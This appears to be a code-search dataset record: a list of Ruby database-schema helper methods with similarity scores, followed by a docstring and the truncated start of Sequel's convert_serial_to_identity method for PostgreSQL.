"def get_keys\n table_cond = @files ? \"AND r.relname IN (#{@files.map{|(t,f)|\"'#{t}'\"}.join(', ')})\" : ''\n results = query(<<-SQL)\n SELECT\n r.relname,\n c.conname,\n c.contype,\n pg_get_constraintdef(c.oid)\n FROM\n pg_class r,\n pg_constraint c\n WHERE\n c.conrelid = r.oid\n AND c.contype IN ('f', 'p')\n AND r.relkind = 'r'\n AND r.relnamespace = (SELECT oid FROM pg_namespace WHERE nspname = '#{@config[:schema]}')\n #{table_cond}\n SQL\n\n hash = {}\n results.map do |row|\n table, key, type, create_sql = row.split(/\\t/)\n hash[key] = {:table => table, :type => type == 'p' ? :primary_key : :foreign_key, :create_sql => create_sql}\n end\n hash\n end",
"def column_hash\n @table.hashes.reduce({}) do |h, row|\n row.each do |k,v|\n (h[k.symbolize] ||= []) << parse_formula(v)\n end\n h\n end\n end",
"def compound_key_constraints\n @compound_key_constraints ||= {}\n end",
"def to_constr\n @hash.map{|id, ty|\n Constraint.new(Type::TyVar[id], ty)\n }\n end",
"def constraints; end",
"def constraints; end",
"def constraints; end",
"def column_references_sql(column)\n sql = \" REFERENCES #{quote_schema_table(column[:table])}\"\n sql << \"(#{Array(column[:key]).map{|x| quote_identifier(x)}.join(COMMA_SEPARATOR)})\" if column[:key]\n sql << \" ON DELETE #{on_delete_clause(column[:on_delete])}\" if column[:on_delete]\n sql << \" ON UPDATE #{on_delete_clause(column[:on_update])}\" if column[:on_update]\n sql\n end",
"def column_definitions(table_name)\n fields = query(<<~SQL, \"SCHEMA\")\n SELECT a.attname, format_type(a.atttypid, a.atttypmod),\n pg_get_expr(d.adbin, d.adrelid), a.attnotnull, a.atttypid, a.atttypmod,\n c.collname, NULL AS comment,\n #{supports_virtual_columns? ? 'attgenerated' : quote('')} as attgenerated,\n NULL as is_hidden\n FROM pg_attribute a\n LEFT JOIN pg_attrdef d ON a.attrelid = d.adrelid AND a.attnum = d.adnum\n LEFT JOIN pg_type t ON a.atttypid = t.oid\n LEFT JOIN pg_collation c ON a.attcollation = c.oid AND a.attcollation <> t.typcollation\n WHERE a.attrelid = #{quote(quote_table_name(table_name))}::regclass\n AND a.attnum > 0 AND NOT a.attisdropped\n ORDER BY a.attnum\n SQL\n\n crdb_fields = crdb_column_definitions(table_name)\n\n # Use regex comparison because if a type is an array it will\n # have [] appended to the end of it.\n target_types = [\n /geometry/,\n /geography/,\n /interval/,\n /numeric/\n ]\n\n re = Regexp.union(target_types)\n fields.map do |field|\n dtype = field[1]\n field[1] = crdb_fields[field[0]][2].downcase if re.match(dtype)\n field[7] = crdb_fields[field[0]][1]&.gsub!(/^\\'|\\'?$/, '')\n field[9] = true if crdb_fields[field[0]][3]\n field\n end\n fields.delete_if do |field|\n # Don't include rowid column if it is hidden and the primary key\n # is not defined (meaning CRDB implicitly created it).\n if field[0] == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n field[9] && !primary_key(table_name)\n else\n false # Keep this entry.\n end\n end\n end",
"def column_references_sql(column)\n sql = \" REFERENCES #{quote_schema_table(column[:table])}\"\n sql << \"(#{Array(column[:key]).map{|x| quote_identifier(x)}.join(COMMA_SEPARATOR)})\" if column[:key]\n sql << \" ON DELETE #{on_delete_clause(column[:on_delete])}\" if column[:on_delete]\n sql << \" ON UPDATE #{on_delete_clause(column[:on_update])}\" if column[:on_update]\n sql\n end",
"def column_references_column_constraint_sql(column)\n column_references_sql(column)\n end",
"def columns_hash\n self\n end",
"def column_definitions(table_name) # :nodoc:\n query(<<-end_sql, 'SCHEMA')\n SELECT a.attname, format_type(a.atttypid, a.atttypmod),\n pg_get_expr(d.adbin, d.adrelid), a.attnotnull, a.atttypid, a.atttypmod,\n format_encoding(a.attencodingtype::integer)\n FROM pg_attribute a LEFT JOIN pg_attrdef d\n ON a.attrelid = d.adrelid AND a.attnum = d.adnum\n WHERE a.attrelid = '#{quote_table_name(table_name)}'::regclass\n AND a.attnum > 0 AND NOT a.attisdropped\n ORDER BY a.attnum\n end_sql\n end",
"def column_definitions(table_name)\n select_rows(<<-end_sql, 'SCHEMA')\n SELECT a.attname, format_type(a.atttypid, a.atttypmod),\n pg_get_expr(d.adbin, d.adrelid), a.attnotnull, a.atttypid, a.atttypmod,\n (SELECT c.collname FROM pg_collation c, pg_type t\n WHERE c.oid = a.attcollation AND t.oid = a.atttypid\n AND a.attcollation <> t.typcollation),\n col_description(a.attrelid, a.attnum) AS comment\n FROM pg_attribute a\n LEFT JOIN pg_attrdef d ON a.attrelid = d.adrelid AND a.attnum = d.adnum\n WHERE a.attrelid = #{quote(quote_table_name(table_name))}::regclass\n AND a.attnum > 0 AND NOT a.attisdropped\n ORDER BY a.attnum\n end_sql\n end",
"def column_definitions(table_name)\r\n query <<-end_sql\r\n SELECT a.attname, format_type(a.atttypid, a.atttypmod), d.adsrc, a.attnotnull, c.consrc\r\n FROM pg_attribute a LEFT JOIN pg_attrdef d\r\n ON a.attrelid = d.adrelid AND a.attnum = d.adnum\r\n LEFT JOIN pg_constraint c ON a.attrelid = c.conrelid AND \r\n c.contype = 'c' AND c.conkey[1] = a.attnum\r\n WHERE a.attrelid = '#{table_name}'::regclass\r\n AND a.attnum > 0 AND NOT a.attisdropped\r\n ORDER BY a.attnum\r\n end_sql\r\n end",
"def column_definitions(table_name) # :nodoc:\n local_condition = 'AND a.attislocal IS TRUE' if @_dump_mode\n query(<<-SQL, 'SCHEMA')\n SELECT a.attname, format_type(a.atttypid, a.atttypmod),\n pg_get_expr(d.adbin, d.adrelid), a.attnotnull, a.atttypid, a.atttypmod,\n (SELECT c.collname FROM pg_collation c, pg_type t\n WHERE c.oid = a.attcollation AND t.oid = a.atttypid AND a.attcollation <> t.typcollation),\n col_description(a.attrelid, a.attnum) AS comment\n FROM pg_attribute a\n LEFT JOIN pg_attrdef d ON a.attrelid = d.adrelid AND a.attnum = d.adnum\n WHERE a.attrelid = '#{quote_table_name(table_name)}'::regclass\n AND a.attnum > 0\n AND a.attisdropped IS FALSE\n #{local_condition}\n ORDER BY a.attnum\n SQL\n end",
"def order_column_definitions\n dump.gsub!(/^(?<table>CREATE TABLE .+?\\(\\n)(?<columns>.+?)(?=\\n\\);$)/m) do\n table = $~[:table]\n columns =\n $~[:columns]\n .split(\",\\n\")\n .sort_by { |column| column.delete('\"') }\n .partition { |column| !column.match?(/\\A *CONSTRAINT/) }\n .flatten\n .join(\",\\n\")\n\n [table, columns].join\n end\n end",
"def order_column_definitions\n dump.gsub!(/^(?<table>CREATE TABLE .+?\\(\\n)(?<columns>.+?)(?=\\n\\);$)/m) do\n columns =\n $~[:columns]\n .split(\",\\n\")\n .sort_by { |column| column[/[^ \"]+/] }\n .partition { |column| !column.match?(/\\A *CONSTRAINT/) }\n .flatten\n .join(\",\\n\")\n\n [$~[:table], columns].join\n end\n end",
"def column_definitions(table_name) #:nodoc:\n exec_query(<<-end_sql, 'SCHEMA').rows\n SELECT a.attname, format_type(a.atttypid, a.atttypmod),\n pg_get_expr(d.adbin, d.adrelid), a.attnotnull, a.atttypid, a.atttypmod\n FROM pg_attribute a LEFT JOIN pg_attrdef d\n ON a.attrelid = d.adrelid AND a.attnum = d.adnum\n WHERE a.attrelid = '#{quote_table_name(table_name)}'::regclass\n AND a.attnum > 0 AND NOT a.attisdropped\n ORDER BY a.attnum\n end_sql\n end",
"def validate_constraint(table, name)\n current_instructions << Instructions::ValidateConstraint.new(\n table: table,\n name: name,\n )\n end",
"def find_relations\n sql = <<-eos\n SELECT\n tc.constraint_name, tc.table_name, kcu.column_name,\n ccu.table_name AS foreign_table_name,\n ccu.column_name AS foreign_column_name\n FROM\n information_schema.table_constraints AS tc\n JOIN information_schema.key_column_usage AS kcu ON tc.constraint_name = kcu.constraint_name\n JOIN information_schema.constraint_column_usage AS ccu ON ccu.constraint_name = tc.constraint_name\n WHERE constraint_type = 'FOREIGN KEY'\n eos\n @relations = @connection.exec(sql).values\n end",
"def create_constraints(drop = nil)\n contraints = {\n \"Page\" => [:page_id],\n \"Term\" => [:uri]\n }\n contraints.each do |label, fields|\n fields.each do |field|\n begin\n name = 'o'\n name = label.downcase if drop && drop == :drop\n query(\n \"#{drop && drop == :drop ? 'DROP' : 'CREATE'} CONSTRAINT ON (#{name}:#{label}) ASSERT #{name}.#{field} IS UNIQUE;\"\n )\n rescue Neography::NeographyError => e\n raise e unless e.message =~ /already exists/ || e.message =~ /No such constraint/\n end\n end\n end\n end",
"def column_definition_primary_key_sql(sql, column)\n if column[:primary_key]\n if name = column[:primary_key_constraint_name]\n sql << \" CONSTRAINT #{quote_identifier(name)}\"\n end\n sql << \" \" << primary_key_constraint_sql_fragment(column)\n constraint_deferrable_sql_append(sql, column[:primary_key_deferrable])\n end\n end",
"def schema_meta_structure\n CreateVersionsTableQuery.new.to_cql\n end",
"def column_definitions(table_name) #:nodoc:\n exec_query(<<-end_sql, 'SCHEMA')\n SELECT a.attname as column_name, format_type(a.atttypid, a.atttypmod) as column_type, d.adsrc as column_default, a.attnotnull as column_not_null\n FROM pg_attribute a LEFT JOIN pg_attrdef d\n ON a.attrelid = d.adrelid AND a.attnum = d.adnum\n WHERE a.attrelid = '#{quote_table_name(table_name)}'::regclass\n AND a.attnum > 0 AND NOT a.attisdropped\n ORDER BY a.attnum\n end_sql\n end",
"def column_definitions(table_name) #:nodoc:\n query <<-end_sql\nselect\nc.name,\ncase\nwhen t.name in ('char', 'varchar', 'nchar', 'nvarchar') then 'string'\nwhen t.name in ('binary', 'varbinary', 'image') then 'binary'\nwhen t.name in ('int', 'smallint', 'tinyint') then 'integer'\nwhen t.name in ('datetime', 'smalldatetime') then 'datetime'\nwhen t.name = 'bit' then 'boolean'\nwhen t.name = 'numeric' and c.prec < 10 and c.scale = 0 then 'integer'\nwhen t.name = 'numeric' then 'decimal'\nwhen t.name = 'text' then 'text'\nelse t.name\nend type,\nd.text,\nc.isnullable\nfrom\nsyscolumns c\ninner join systypes t\non c.xusertype = t.xusertype\nleft outer join syscomments d\non c.cdefault = d.id\nwhere\nc.id = object_id('#{table_name}')\norder by\nc.colid\nend_sql\n end",
"def setup_auto_validations\n not_null_cols, explicit_not_null_cols = db_schema.select{|col, sch| sch[:allow_null] == false}.partition{|col, sch| sch[:default].nil?}.map{|cs| cs.map{|col, sch| col}}\n @auto_validate_not_null_columns = not_null_cols - Array(primary_key)\n explicit_not_null_cols += Array(primary_key)\n @auto_validate_explicit_not_null_columns = explicit_not_null_cols.uniq\n @auto_validate_max_length_columns = db_schema.select{|col, sch| sch[:type] == :string && sch[:max_length].is_a?(Integer)}.map{|col, sch| [col, sch[:max_length]]}\n table = dataset.first_source_table\n @auto_validate_unique_columns = if db.supports_index_parsing? && [Symbol, SQL::QualifiedIdentifier, SQL::Identifier, String].any?{|c| table.is_a?(c)}\n db.indexes(table).select{|name, idx| idx[:unique] == true}.map{|name, idx| idx[:columns].length == 1 ? idx[:columns].first : idx[:columns]}\n else\n []\n end\n end",
"def column_definitions(table_name)\n select_rows(<<-end_sql, 'SCHEMA')\n SELECT a.attname, format_type(a.atttypid, a.atttypmod),\n pg_get_expr(d.adbin, d.adrelid), a.attnotnull, a.atttypid, a.atttypmod\n FROM pg_attribute a LEFT JOIN pg_attrdef d\n ON a.attrelid = d.adrelid AND a.attnum = d.adnum\n WHERE a.attrelid = '#{quote_table_name(table_name)}'::regclass\n AND a.attnum > 0 AND NOT a.attisdropped\n ORDER BY a.attnum\n end_sql\n end",
"def add_check(table_name, condition, options)\n name = options.fetch(:name) { raise 'add_check, :name option required' }\n\n execute <<-SQL\n ALTER TABLE #{quote_table_name(table_name)}\n ADD CONSTRAINT #{quote_column_name(name)}\n CHECK (#{condition})\n SQL\n end",
"def propertiesForConstraint\n\tend",
"def remember_foreign_key_columns(node)\n table_name = @table_name\n foreign_key_column = node.arguments[1].to_s\n @foreign_keys[table_name] ||= []\n if foreign_key_column =~ /(.*?)_id$/\n if @foreign_keys[table_name].delete(\"#{$1}_type\")\n @foreign_keys[table_name] << [\"#{$1}_id\", \"#{$1}_type\"]\n else\n @foreign_keys[table_name] << foreign_key_column\n end\n elsif foreign_key_column =~ /(.*?)_type$/\n if @foreign_keys[table_name].delete(\"#{$1}_id\")\n @foreign_keys[table_name] << [\"#{$1}_id\", \"#{$1}_type\"]\n else\n @foreign_keys[table_name] << foreign_key_column\n end\n end\n end",
"def to_rules(table)\n table.rows.map do |row|\n row_data = table.column_names.zip(row).map do |column_name, value|\n case column_name\n when 'Id'\n ['id', value.to_i]\n when 'Pattern'\n ['pattern', value]\n when 'Tag Id'\n ['tag_id', value.nil? ? nil : value.to_i]\n when 'Tag Name'\n ['tag_name', value]\n else\n raise ArgumentError.new(\"Unknown Transaction column #{column_name}\")\n end\n end\n Hash[row_data]\n end\nend",
"def sqlite3_schema(table_name)\n table_schema = @dbm.sqlite3_pragma(table_name)\n\n # First, find the max lengths of each column's title strings\n # for nice print out in a fixed length of table format\n max_column_name_length = 0\n max_type_name_col_length = 22\n max_nullable_col_length = 10\n max_pk_col_length = 5\n\n table_schema.each {|schema|\n if max_column_name_length < schema[1].length\n max_column_name_length = schema[1].length\n end\n \n # Check null status and convert the stored binary value\n # into string \"YES\" or \"NO\"\n schema[3] = (schema[3] == 1 ? \"YES\":\"NO\")\n # Check primary key status and convert the stored\n # binary value into string \"YES\" or \"NO\"\n schema[5] = (schema[5] == 1 ? \"YES\":\"NO\")\n }\n\n # Print out the schema in a table format\n puts table_name\n printf \"%-5s | %-#{max_column_name_length}s | %-22s | %-5s | %-5s\\n\",\\\n \"CID\", \"NAME\", \"TYPE\", \"NULL?\", \"PK?\"\n dash_line_splitter = '-' * (50 + max_column_name_length)\n puts dash_line_splitter\n table_schema.each {|schema|\n printf \"%-5s | %-#{max_column_name_length}s | %-22s | %-5s | %-5s\\n\",\\\n schema[0].to_s, schema[1], schema[2], schema[3], schema[5]\n }\n end",
"def remember_foreign_key_columns(node)\n table_name = @table_name\n foreign_key_column = node.arguments.all.first.to_s\n @foreign_keys[table_name] ||= []\n if foreign_key_column =~ /(.*?)_id$/\n @foreign_keys[table_name] <<\n if @foreign_keys[table_name].delete(\"#{Regexp.last_match(1)}_type\")\n [\"#{Regexp.last_match(1)}_id\", \"#{Regexp.last_match(1)}_type\"]\n else\n foreign_key_column\n end\n foreign_id_column = foreign_key_column\n elsif foreign_key_column =~ /(.*?)_type$/\n @foreign_keys[table_name] <<\n if @foreign_keys[table_name].delete(\"#{Regexp.last_match(1)}_id\")\n [\"#{Regexp.last_match(1)}_id\", \"#{Regexp.last_match(1)}_type\"]\n else\n foreign_key_column\n end\n foreign_id_column = \"#{Regexp.last_match(1)}_id\"\n end\n\n if foreign_id_column\n index_node = node.arguments.all.last.hash_value('index')\n if index_node.present? && (index_node.to_s != 'false')\n @index_columns[table_name] ||= []\n @index_columns[table_name] << foreign_id_column\n end\n end\n end",
"def hash\n [schema, name].hash\n end",
"def columns_hash?(connection, table_name)\n @columns_hash.key?(table_name)\n end",
"def is_constraint?(trigger_definition)\n !!(trigger_definition =~ /^CREATE CONSTRAINT TRIGGER/)\n end",
"def check_columns!\n if columns.nil? || columns.empty?\n raise Error, 'cannot literalize HashRow without columns'\n end\n end",
"def add_check_constraint(table, name, check)\n current_instructions << Instructions::AddCheckConstraint.new(\n table: table,\n name: name,\n check: check,\n )\n end",
"def columns_hash\n @columns_hash ||= columns.inject({}){|r,c| r.merge(c[:name].to_sym => c)}\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n fks = ado_schema_foreign_keys(table).inject({}) do |memo, fk|\n name = m.call(fk['FK_NAME'])\n specs = memo[name] ||= {\n :columns => [],\n :table => m.call(fk['PK_TABLE_NAME']),\n :key => [],\n :deferrable => fk['DEFERRABILITY'],\n :name => name,\n :on_delete => fk['DELETE_RULE'],\n :on_update => fk['UPDATE_RULE']\n }\n specs[:columns] << m.call(fk['FK_COLUMN_NAME'])\n specs[:key] << m.call(fk['PK_COLUMN_NAME'])\n memo\n end\n fks.values\n end",
"def columns_hash(connection, table_name)\n @columns_hash.fetch(table_name) do\n @columns_hash[deep_deduplicate(table_name)] = columns(connection, table_name).index_by(&:name).freeze\n end\n end",
"def all_constraints(table_filter=nil)\n constraints = tables.values.map(&:constraints).flatten\n constraints.delete_if{|c|!table_filter.include?(c.table.name)} if table_filter\n constraints\n end",
"def hash\n [type, hide_placeholders, base_justification, min_column_width, column_gap_rule, column_gap, row_gap_rule, row_gap, items].hash\n end",
"def foreign_key_constraint(from_table, from_column, options = {})\n to_table = options[:to_table] || from_column.to_s[/^(.+)_id$/, 1].tableize\n on_delete = case options[:on_delete]\n when :cascade; 'cascade'\n when :nullify; 'set null'\n end\n on_update = case options[:on_update]\n when :cascade; 'cascade'\n when :nullify; 'set null'\n when :restrict; 'restrict'\n end\n cmd = [ \"constraint #{constraint_name from_table, from_column}\",\n \"foreign key (#{from_column})\",\n \"references #{ActiveRecord::Base.connection.quote_table_name to_table}(id)\",\n ]\n cmd << \"on delete #{on_delete}\" if on_delete\n cmd << \"on update #{on_update}\" if on_update\n cmd.join(' ')\n end",
"def foreign_keys(table_name)\n stmt = @connection.foreign_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n\n result.map do |key|\n fk_from_table = key[2] # PKTABLE_NAME\n fk_to_table = key[6] # FKTABLE_NAME\n\n ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new(\n fk_from_table,\n fk_to_table,\n name: key[11], # FK_NAME\n column: key[3], # PKCOLUMN_NAME\n primary_key: key[7], # FKCOLUMN_NAME\n on_delete: key[10], # DELETE_RULE\n on_update: key[9] # UPDATE_RULE\n )\n end\n end",
"def check_constraints\n case self.recordable\n when ExtractionsExtractionFormsProjectsSectionsQuestionRowColumnField\n case self.recordable.question_row_column_field.question_row_column.question_row_column_type.name\n when 'text'\n min_length = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:min_length).to_i\n max_length = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:max_length).to_i\n if self.persisted? && self.name.length > 0 && (self.name.length < min_length || self.name.length > max_length)\n errors.add(:length, \"must be between #{ min_length.to_s } and #{ max_length.to_s }\")\n end\n when 'numeric'\n # First check that we aren't trying to validate any of the ~, <, >, ≤, ≥ special characters.\n if self.recordable.question_row_column_field.question_row_column.question_row_column_fields.second == self.recordable.question_row_column_field\n unless (self.name =~ /\\A[-+]?[0-9]*\\.?[0-9]+\\z/) || self.name != ''\n errors.add(:value, 'Must be numeric')\n end\n\n min_value = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:min_value).to_i\n max_value = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:max_value).to_i\n if self.persisted? && (self.name.to_i < min_value || self.name.to_i > max_value)\n errors.add(:value, \"must be numeric and between #{ min_value.to_s } and #{ max_value.to_s }\")\n end\n end\n end\n end\n end",
"def contraints(p_module_object)\n\t\tconstraints = []\n\t\tmin = self.find_property('MIN')\n\t\tif ! min.nil?\n\t\t\tconstraints << ConstraintChecker::Constraints::Min.new(p_module_object, min.value)\n\t\tend\n\t\tmax = self.find_property('MAX')\n\t\tif !max.nil?\n\t\t\tconstraints << ConstraintChecker::Constraints::Max.new(p_module_object, max.value)\n\t\tend\n\t\tconstraints \n\n\tend",
"def create_table_request\n {\n table_name: self.table_name.to_s,\n attribute_definitions: self.attribute_definitions,\n key_schema: self.key_schema,\n provisioned_throughput: self.provisioned_throughput\n }\n end",
"def validate_forced_metadata(forced_metadata)\n # if custom metadata does not contain order(Array) or mapping(Hash),then it's not valid metadata\n unless (forced_metadata['order'].nil? || forced_metadata['mapping'].nil?)\n return if (forced_metadata['order'].class.eql?(Array) && forced_metadata['mapping'].class.eql?(Hash))\n end\n\n raise DTK::Client::DtkError,\"Provided table definition is not valid. Please review your order and mapping for provided definition: \\n #{forced_metadata.inspect}\"\n end",
"def bitfields column_name\n @@bitfields[column_name].keys\n end",
"def resource_schema\n schemated = {}\n resource.columns_hash.each { |key, value| schemated[key] = value.type }\n schemated\n end",
"def load_table_heading(conn, builder, table)\n primary_key_columns = []\n builder.heading{\n columns = conn.schema(table, {:reload => true})\n columns.each do |name, info|\n #puts info.inspect\n \n # find attribute definition\n defn = {:domain => dbtype_to_ruby_type(info),\n :mandatory => !info[:allow_null] }\n unless info[:ruby_default].nil?\n defn[:default] = info[:ruby_default]\n end\n \n # mark primary key columns\n if primary_key_columns and info[:primary_key]\n primary_key_columns << name \n end\n \n # build the attribute\n builder.attribute(name, defn)\n end\n }\n primary_key_columns\n end",
"def check_schema_migrations\n unless column_family_exists?('schema_migrations')\n say \"Creating schema_migrations column family\"\n connection.execute_cql_query(DatastaxRails::Cql::CreateColumnFamily.new('schema_migrations').key_type(:text).columns(:digest => :text, :solrconfig => :text, :stopwords => :text).to_cql)\n end\n \n check_key_name('schema_migrations')\n end",
"def cti_columns\n h = {}\n cti_models.each { |m| h[m.table_name] = m.cti_table_columns }\n h\n end",
"def supports_named_column_constraints?\n true\n end",
"def column_definitions(table_name) #:nodoc:\n pieces = table_name.split('.')\n \n if pieces.length == 1\n schema_name = 'public'\n table_name = pieces.last\n else\n schema_name, table_name = pieces.first, pieces.last\n end\n \n query <<-end_sql\n SELECT column_name, data_type, column_default, is_nullable\n FROM v_catalog.columns\n WHERE table_schema = '#{schema_name.gsub(/(^\"|\"$)/,'')}'\n AND table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n schema, _ = opts.fetch(:schema, schema_and_table(table))\n\n h = {}\n fklod_map = FOREIGN_KEY_LIST_ON_DELETE_MAP \n reverse = opts[:reverse]\n\n (reverse ? _reverse_foreign_key_list_ds : _foreign_key_list_ds).where_each(Sequel[:cl][:oid]=>regclass_oid(table)) do |row|\n if reverse\n key = [row[:schema], row[:table], row[:name]]\n else\n key = row[:name]\n end\n\n if r = h[key]\n r[:columns] << m.call(row[:column])\n r[:key] << m.call(row[:refcolumn])\n else\n entry = h[key] = {\n :name=>m.call(row[:name]),\n :columns=>[m.call(row[:column])],\n :key=>[m.call(row[:refcolumn])],\n :on_update=>fklod_map[row[:on_update]],\n :on_delete=>fklod_map[row[:on_delete]],\n :deferrable=>row[:deferrable],\n :table=>schema ? SQL::QualifiedIdentifier.new(m.call(row[:schema]), m.call(row[:table])) : m.call(row[:table]),\n }\n\n unless schema\n # If not combining schema information into the :table entry\n # include it as a separate entry.\n entry[:schema] = m.call(row[:schema])\n end\n end\n end\n\n h.values\n end",
"def required_cols(model, used_attrs)\n required_cols = model.columns_hash.values.reject(&:null).map(&:name).map do |name|\n (foreign_key_to_association_mapping(model)[name] || name).to_s\n end\n (required_cols & used_attrs).sort\n end",
"def constraint_params\n params.require(:constraint).permit(:title, :decision_id)\n end",
"def constraint_name(table_name, relationship_name)\n \"#{table_name}_#{relationship_name}_fk\"\n end",
"def freeze\n @auto_validate_not_null_columns.freeze\n @auto_validate_explicit_not_null_columns.freeze\n @auto_validate_max_length_columns.freeze\n @auto_validate_unique_columns.freeze\n\n super\n end",
"def apply_hash_constraint( key, constraint )\n\t\taction = constraint[\"constraint\"]\n\n\t\trval = case action\n\t\t\twhen String\n\t\t\t\tself.apply_string_constraint( key, action )\n\t\t\twhen Regexp\n\t\t\t\tself.apply_regexp_constraint( key, action )\n\t\t\twhen Proc\n\t\t\t\tif args = constraint[\"params\"]\n\t\t\t\t\targs.collect! {|field| @form[field] }\n\t\t\t\t\tself.apply_proc_constraint( key, action, *args )\n\t\t\t\telse\n\t\t\t\t\tself.apply_proc_constraint( key, action )\n\t\t\t\tend\n\t\t\tend\n\n\t\t# If the validation failed, and there's a name for this constraint, replace\n\t\t# the name in @invalid_fields with the name\n\t\tif !rval && constraint[\"name\"]\n\t\t\t@invalid_fields[key] = constraint[\"name\"]\n\t\tend\n\n\t\treturn rval\n\tend",
"def dump_add_fk_constraints(table, fks)\n sfks = String.new\n sfks << \"alter_table(#{table.inspect}) do\\n\"\n sfks << create_table_generator do\n fks.sort_by{|fk| fk[:columns]}.each do |fk|\n foreign_key fk[:columns], fk\n end\n end.dump_constraints.gsub(/^foreign_key /, ' add_foreign_key ')\n sfks << \"\\nend\"\n end",
"def attributes_from_column_definition\n connection.columns(self.class.table_name, \"#{self.class.name} Columns\").inject({}) do |attributes, column| \n attributes[column.name] = column.default unless column.name == self.class.primary_key\n attributes\n end\n end",
"def to_hsh\n {name => {:columns => columns, :unqiue => unique}}\n end",
"def create_table_sql(name, generator, options)\n unless supports_named_column_constraints?\n # Split column constraints into table constraints if they have a name\n generator.columns.each do |c|\n if (constraint_name = c.delete(:foreign_key_constraint_name)) && (table = c.delete(:table))\n opts = {}\n opts[:name] = constraint_name\n [:key, :on_delete, :on_update, :deferrable].each{|k| opts[k] = c[k]}\n generator.foreign_key([c[:name]], table, opts)\n end\n if (constraint_name = c.delete(:unique_constraint_name)) && c.delete(:unique)\n generator.unique(c[:name], :name=>constraint_name)\n end\n if (constraint_name = c.delete(:primary_key_constraint_name)) && c.delete(:primary_key)\n generator.primary_key([c[:name]], :name=>constraint_name)\n end\n end\n end\n\n unless can_add_primary_key_constraint_on_nullable_columns?\n if pk = generator.constraints.find{|op| op[:type] == :primary_key}\n pk[:columns].each do |column|\n if matched_column = generator.columns.find{|gc| gc[:name] == column}\n matched_column[:null] = false\n end\n end\n end\n end\n\n \"#{create_table_prefix_sql(name, options)} (#{column_list_sql(generator)})\"\n end",
"def create_ast\n tables = sqlite3_all_tables\n if !tables.empty?\n tables.each {|table|\n tb_schema = sqlite3_pragma(table[1])\n column_info = Hash.new\n tb_schema.each {|schema|\n # schema:\n # 0 := CID (int), 1 := table name (str), 2 := type (str),\n # 3 := null? (int, 1: Null. 0: Not-null)\n # 5 := PK? (int, 1: PK. 0: Not-PK)\n column_info[schema[1]] = {:type => schema[2], :null? => schema[3], :pk? => schema[5]}\n }\n @table_ast[table[1]] = column_info\n }\n end\n return @table_ast\n end",
"def to_h!\n h = {}\n @schema.keys.each do |k|\n v = self[k]\n h[k] = Configuration.config?(v) ? v.to_h! : v.inspect\n end\n h\n end",
"def hash_fk_model\n foreign_keys = {}\n @model_class.reflect_on_all_associations(:belongs_to).map{ |r|\n foreign_keys[r.association_foreign_key.to_sym] = r.name\n }\n foreign_keys\n end",
"def writable_columns\n writable_attributes.keys\n end",
"def hash\n [check_id, exceptions, key, links, port, proof, protocol, since, status].hash\n end",
"def column_definition_unique_sql(sql, column)\n if column[:unique]\n if name = column[:unique_constraint_name]\n sql << \" CONSTRAINT #{quote_identifier(name)}\"\n end\n sql << ' ' << unique_constraint_sql_fragment(column)\n constraint_deferrable_sql_append(sql, column[:unique_deferrable])\n end\n end",
"def _column_hashes\n @_column_hashes ||= {}\n end",
"def columns_hash\n @columns_hash ||= columns.inject({}) { |hash, column| hash[column.name] = column; hash }\n end"
] |
[
"0.69810116",
"0.69258285",
"0.6856217",
"0.67866033",
"0.6391585",
"0.62114024",
"0.6107531",
"0.6050771",
"0.6030892",
"0.5981253",
"0.5973716",
"0.591812",
"0.58696294",
"0.5748742",
"0.5745037",
"0.57010984",
"0.56576616",
"0.5642085",
"0.5629582",
"0.5566976",
"0.54869485",
"0.53686285",
"0.5330657",
"0.5316773",
"0.5300399",
"0.52783096",
"0.5221015",
"0.5215483",
"0.51311255",
"0.5119285",
"0.5119285",
"0.5119285",
"0.5098616",
"0.50970966",
"0.50745237",
"0.506494",
"0.5058977",
"0.50376594",
"0.5035219",
"0.5033428",
"0.50237113",
"0.5012528",
"0.5001577",
"0.5000636",
"0.49607277",
"0.4953475",
"0.49515483",
"0.49476013",
"0.49397784",
"0.49340558",
"0.49186653",
"0.49181342",
"0.49126768",
"0.4906491",
"0.4906435",
"0.4904822",
"0.49047476",
"0.48972046",
"0.48958373",
"0.48766655",
"0.4872862",
"0.4866733",
"0.48657078",
"0.4855562",
"0.4849001",
"0.48371488",
"0.48305807",
"0.4826238",
"0.48094365",
"0.48015577",
"0.47931963",
"0.47866577",
"0.47808814",
"0.47767743",
"0.47718567",
"0.4764292",
"0.4763012",
"0.47578618",
"0.47201383",
"0.4718352",
"0.47033137",
"0.47023448",
"0.47003573",
"0.4697774",
"0.46893054",
"0.46840307",
"0.46835884",
"0.46832615",
"0.46686152",
"0.46632165",
"0.46619216",
"0.46555597",
"0.4654707",
"0.46497637",
"0.46377704",
"0.4620948",
"0.46131125",
"0.46126926",
"0.46077788",
"0.46017665"
] |
0.7181034
|
0
|
Convert the first primary key column in the +table+ from being a serial column to being an identity column. If the column is already an identity column, assume it was already converted and make no changes. Only supported on PostgreSQL 10.2+, since on those versions Sequel will use identity columns instead of serial columns for auto incrementing primary keys. Only supported when running as a superuser, since regular users cannot modify system tables, and there is no way to keep an existing sequence when changing an existing column to be an identity column. This method can raise an exception in at least the following cases where it may otherwise succeed (there may be additional cases not listed here): the serial column was added after table creation using PostgreSQL <7.3; a regular index also exists on the column (such an index can probably be dropped, as the primary key index should suffice). Options: :column :: Specify the column to convert instead of using the first primary key column :server :: Run the SQL on the given server
|
def convert_serial_to_identity(table, opts=OPTS)
  raise Error, "convert_serial_to_identity is only supported on PostgreSQL 10.2+" unless server_version >= 100002

  server = opts[:server]
  server_hash = server ? {:server=>server} : OPTS
  ds = dataset
  ds = ds.server(server) if server

  # Rewriting pg_depend/pg_attribute below requires superuser privileges.
  raise Error, "convert_serial_to_identity requires superuser permissions" unless ds.get{current_setting('is_superuser')} == 'on'

  table_oid = regclass_oid(table)
  im = input_identifier_meth
  unless column = (opts[:column] || ((sch = schema(table).find{|_, sc| sc[:primary_key] && sc[:auto_increment]}) && sch[0]))
